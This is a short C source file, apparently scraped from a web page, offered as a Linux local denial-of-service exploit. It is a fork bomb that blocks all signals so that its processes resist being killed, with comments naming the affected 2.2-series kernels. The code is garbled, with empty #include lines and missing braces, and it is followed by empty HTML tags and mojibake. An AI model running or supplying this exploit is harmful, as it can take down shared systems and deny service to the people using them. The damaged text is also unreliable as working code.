/* Linux Local Denial of Service Exploit This is not an ordinary forkbomb. This can bring down a machine whether or not user process limits are enforced. These processes are unkillable as of 2.2.5 and possibly 2.2.14 (untested on 2.2.15 (comments welcome!) Exploit couresy of Christophe Blaess (ccb@club-internet.fr) */ #include #include int main (void) sigset_t set; struct timespec timespec = {0, 0}; sigfillset (& set); while (1) fork(); sigtimedwait (& set, NULL, & timespec); return (0);
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            ÑÇÖÞÅ·ÃÀÔÚÏß